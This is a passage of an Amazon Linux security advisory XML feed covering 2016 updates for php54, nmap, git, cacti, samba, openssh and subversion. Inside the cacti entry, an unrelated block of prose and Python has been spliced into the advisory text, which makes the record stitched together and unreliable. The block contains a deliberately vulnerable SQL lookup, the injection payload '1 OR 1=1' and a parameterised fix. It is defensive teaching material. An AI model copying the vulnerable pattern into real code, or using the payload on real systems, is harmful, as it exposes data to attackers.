name="php54-mbstring" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.45-1.75.amzn1.i686.rpm</filename></package><package 
name="php54-imap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.45-1.75.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.45" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.45-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-671</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-671: low priority package update for nmap</title><issued date="2016-03-22 11:00:00" /><updated date="2016-03-22 11:00:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4885:
The http-domino-enum-passwords.nse script in Nmap before 6.40, when domino-enum-passwords.idpath is set, allows remote servers to upload &quot;arbitrarily named&quot; files via a crafted FullName parameter in a response, as demonstrated using directory traversal sequences.
995634:
CVE-2013-4885 nmap: arbitrary file upload flaw in http-domino-enum-passwords NSE script
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4885" title="" id="CVE-2013-4885" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="nmap-ncat" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-ncat-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap-debuginfo" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-debuginfo-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap" version="6.40" release="7.19.amzn1" epoch="2" arch="x86_64"><filename>Packages/nmap-6.40-7.19.amzn1.x86_64.rpm</filename></package><package name="nmap-debuginfo" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-debuginfo-6.40-7.19.amzn1.i686.rpm</filename></package><package name="nmap" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-6.40-7.19.amzn1.i686.rpm</filename></package><package name="nmap-ncat" version="6.40" release="7.19.amzn1" epoch="2" arch="i686"><filename>Packages/nmap-ncat-6.40-7.19.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-672</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-672: important priority package update for git</title><issued date="2016-03-24 12:00:00" /><updated date="2016-03-24 12:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2324:
An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.
1317981:
CVE-2016-2315 CVE-2016-2324 git: path_name() integer truncation and overflow leading to buffer overflow
CVE-2016-2315:
An integer truncation flaw and an integer overflow flaw, both leading to a heap-based buffer overflow, were found in the way Git processed certain path information. A remote attacker could create a specially crafted Git repository that would cause a Git client or server to crash or, possibly, execute arbitrary code.
1317981:
CVE-2016-2315 CVE-2016-2324 git: path_name() integer truncation and overflow leading to buffer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2315" title="" id="CVE-2016-2315" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2324" title="" id="CVE-2016-2324" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="emacs-git-el" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-el-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-svn" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-svn-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git-debuginfo" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-debuginfo-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="git-all" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-all-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="emacs-git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/emacs-git-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-daemon" version="2.7.4" release="1.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/git-daemon-2.7.4-1.47.amzn1.x86_64.rpm</filename></package><package name="gitweb" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/gitweb-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-bzr" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-bzr-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-p4" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-p4-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="perl-Git" 
version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="perl-Git-SVN" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/perl-Git-SVN-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-hg" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-hg-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-email" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-email-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git-cvs" version="2.7.4" release="1.47.amzn1" epoch="0" arch="noarch"><filename>Packages/git-cvs-2.7.4-1.47.amzn1.noarch.rpm</filename></package><package name="git" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-svn" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-svn-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-daemon" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-daemon-2.7.4-1.47.amzn1.i686.rpm</filename></package><package name="git-debuginfo" version="2.7.4" release="1.47.amzn1" epoch="0" arch="i686"><filename>Packages/git-debuginfo-2.7.4-1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-673</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-673: medium priority package update for cacti</title><issued date="2016-03-24 12:00:00" /><updated date="2016-06-03 18:39:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-8604:
CVE-2015-8377:
CVE-2015-4634:
CVE-2015-4454:
CVE-2015-4342:
CVE-2015-2665:
CVE-2014-5026:
CVE-2014-5025:
CVE-2013-5589:
SQL injection vulnerability in cacti/host.php in Cacti 0.8.8b and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter.
1000860:
CVE-2013-5588 CVE-2013-5589 cacti: XSS and SQL injection flaws
CVE-2013-5588:
Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b and earlier allow remote attackers to inject arbitrary web script or HTML via (1) the step parameter to install/index.php or (2) the id parameter to cacti/host.php.
1000860:
CVE-2013-5588 CVE-2013-5589 cacti: XSS and SQL injection flaws
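The host.php flaw described above is the classic case of a numeric request parameter reaching the query text unfiltered. The following Python is an added illustration, not Cacti's code and not part of this advisory feed: it shows that anti-pattern next to its parameterised fix, using an in-memory sqlite3 table with made-up rows as a stand-in for the application's host table.

```python
import sqlite3

# Constructed stand-in for an application "host" table; rows are invented.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE host (id INTEGER PRIMARY KEY, hostname TEXT, snmp_community TEXT)")
    db.executemany("INSERT INTO host VALUES (?, ?, ?)", [
        (1, "web01", "public"),
        (2, "db01", "s3cr3t-ro"),
        (3, "core-sw", "private-rw"),
    ])
    return db

def host_lookup_vulnerable(db, host_id):
    """Hypothetical vulnerable lookup (not Cacti's code): the request value is
    pasted straight into the statement, so it can change the WHERE clause."""
    sql = "SELECT id, hostname, snmp_community FROM host WHERE id = " + str(host_id)
    return db.execute(sql).fetchall()

def host_lookup_fixed(db, host_id):
    """Hardened form: reject anything that is not a plain integer, then bind the
    value as a parameter so it is data, never statement text."""
    if not str(host_id).isdigit():
        raise ValueError("id must be a positive integer")
    return db.execute(
        "SELECT id, hostname, snmp_community FROM host WHERE id = ?",
        (int(host_id),),
    ).fetchall()

# What an attacker would send as the id query parameter (URL-decoded form).
PAYLOAD = "1 OR 1=1"

def demo():
    """Run the same payload through both paths.
    Returns (rows leaked by the vulnerable path, whether the fixed path refused it)."""
    db = make_db()
    leaked = host_lookup_vulnerable(db, PAYLOAD)   # every host, community strings included
    try:
        host_lookup_fixed(db, PAYLOAD)
        blocked = False
    except ValueError:
        blocked = True
    return len(leaked), blocked

if __name__ == "__main__":
    print(demo())   # (3, True)
```

The integer check alone would stop this payload, but the bound parameter is the control that holds when a later change lets a non-numeric value through; keep both.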
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5588" title="" id="CVE-2013-5588" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5589" title="" id="CVE-2013-5589" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5025" title="" id="CVE-2014-5025" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-5026" title="" id="CVE-2014-5026" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-2665" title="" id="CVE-2015-2665" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4342" title="" id="CVE-2015-4342" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4454" title="" id="CVE-2015-4454" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-4634" title="" id="CVE-2015-4634" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8377" title="" id="CVE-2015-8377" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8604" title="" id="CVE-2015-8604" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8g" release="7.6.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8g-7.6.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-674</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-674: medium priority package update for samba</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-7560:
A flaw was found in the way Samba handled ACLs on symbolic links. An authenticated user could use this flaw to gain access to an arbitrary file or directory by overwriting its ACL.
1309992:
CVE-2015-7560 samba: Incorrect ACL get/set allowed on symlink path
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-7560" title="" id="CVE-2015-7560" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="samba-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-modules-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-krb5-locator" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-winbind-krb5-locator-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libwbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libwbclient-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="12.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-winbind-clients-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-pidl" version="4.2.3" release="12.31.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-pidl-4.2.3-12.31.amzn1.noarch.rpm</filename></package><package name="samba-python" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-python-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-tests-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/libsmbclient-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/ctdb-devel-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common" version="4.2.3" release="12.31.amzn1" epoch="0" arch="noarch"><filename>Packages/samba-common-4.2.3-12.31.amzn1.noarch.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="12.31.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/samba-client-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-common-tools-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-client" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-client-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-test-libs-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="12.31.amzn1" epoch="0" arch="x86_64"><filename>Packages/samba-debuginfo-4.2.3-12.31.amzn1.x86_64.rpm</filename></package><package name="samba-test" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-test-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-test-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-test-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-common-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-devel" version="4.2.3" release="12.31.amzn1" epoch="0" 
arch="i686"><filename>Packages/samba-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb-tests" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-tests-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libsmbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind-clients" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-clients-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-winbind-modules" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-modules-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-python" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-python-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-client-libs" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-libs-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-debuginfo" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-debuginfo-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libwbclient" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-client" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-client-4.2.3-12.31.amzn1.i686.rpm</filename></package><package 
name="samba-winbind-krb5-locator" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-winbind-krb5-locator-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="samba-common-tools" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/samba-common-tools-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libwbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libwbclient-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="ctdb" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/ctdb-4.2.3-12.31.amzn1.i686.rpm</filename></package><package name="libsmbclient-devel" version="4.2.3" release="12.31.amzn1" epoch="0" arch="i686"><filename>Packages/libsmbclient-devel-4.2.3-12.31.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-675</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-675: medium priority package update for openssh</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1908:
An access flaw was discovered in OpenSSH; the OpenSSH client did not correctly handle failures to generate authentication cookies for untrusted X11 forwarding. A malicious or compromised remote X application could possibly use this flaw to establish a trusted connection to the local X server, even if only untrusted X11 forwarding was requested.
1298741:
CVE-2016-1908 openssh: possible fallback from untrusted to trusted X11 forwarding
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1908" title="" id="CVE-2016-1908" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="openssh-debuginfo" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-debuginfo-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-ldap-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-clients-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-keycat-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="x86_64"><filename>Packages/openssh-server-6.6.1p1-25.61.amzn1.x86_64.rpm</filename></package><package name="openssh-clients" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-clients-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-ldap" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-ldap-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh" version="6.6.1p1" release="25.61.amzn1" epoch="0" 
arch="i686"><filename>Packages/openssh-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-debuginfo" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-debuginfo-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="pam_ssh_agent_auth" version="0.9.3" release="9.25.61.amzn1" epoch="0" arch="i686"><filename>Packages/pam_ssh_agent_auth-0.9.3-9.25.61.amzn1.i686.rpm</filename></package><package name="openssh-keycat" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-keycat-6.6.1p1-25.61.amzn1.i686.rpm</filename></package><package name="openssh-server" version="6.6.1p1" release="25.61.amzn1" epoch="0" arch="i686"><filename>Packages/openssh-server-6.6.1p1-25.61.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-676</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-676: important priority package update for mod_dav_svn subversion</title><issued date="2016-03-29 15:30:00" /><updated date="2016-03-29 15:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-5343:
1289959:
CVE-2015-5343 subversion: (mod_dav_svn) integer overflow when parsing skel-encoded request bodies
CVE-2015-5259:
Integer overflow in the read_string function in libsvn_ra_svn/marshal.c in Apache Subversion 1.9.x before 1.9.3 allows remote attackers to execute arbitrary code via an svn:// protocol string, which triggers a heap-based buffer overflow and an out-of-bounds read.
1289958:
CVE-2015-5259 subversion: integer overflow in the svn:// protocol parser
CVE-2015-3187:
It was found that when an SVN server (both svnserve and httpd with the mod_dav_svn module) searched the history of a file or a directory, it would disclose its location in the repository if that file or directory was not readable (for example, if it had been moved).
1247252:
CVE-2015-3187 subversion: svn_repos_trace_node_locations() reveals paths hidden by authz
CVE-2015-3184:
It was found that the mod_authz_svn module did not properly restrict anonymous access to Subversion repositories under certain configurations when used with Apache httpd 2.4.x. This could allow a user to anonymously access files in a Subversion repository, which should only be accessible to authenticated users.
1247249:
CVE-2015-3184 subversion: Mixed anonymous/authenticated path-based authz with httpd 2.4
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3184" title="" id="CVE-2015-3184" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3187" title="" id="CVE-2015-3187" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5259" title="" id="CVE-2015-5259" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-5343" title="" id="CVE-2015-5343" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_dav_svn" version="1.8.15" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-1.8.15-1.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.15" release="1.52.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_dav_svn-debuginfo-1.8.15-1.52.amzn1.x86_64.rpm</filename></package><package name="mod_dav_svn" version="1.8.15" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-1.8.15-1.52.amzn1.i686.rpm</filename></package><package name="mod_dav_svn-debuginfo" version="1.8.15" release="1.52.amzn1" epoch="0" arch="i686"><filename>Packages/mod_dav_svn-debuginfo-1.8.15-1.52.amzn1.i686.rpm</filename></package><package name="subversion-debuginfo" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-debuginfo-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-devel" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-devel-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-libs" version="1.8.15" release="1.54.amzn1" epoch="0" arch="x86_64"><filename>Packages/subversion-libs-1.8.15-1.54.amzn1.x86_64.rpm</filename></package><package name="subversion-javahl" version="1.8.15" release="1.54.amzn1" epoch="0" 
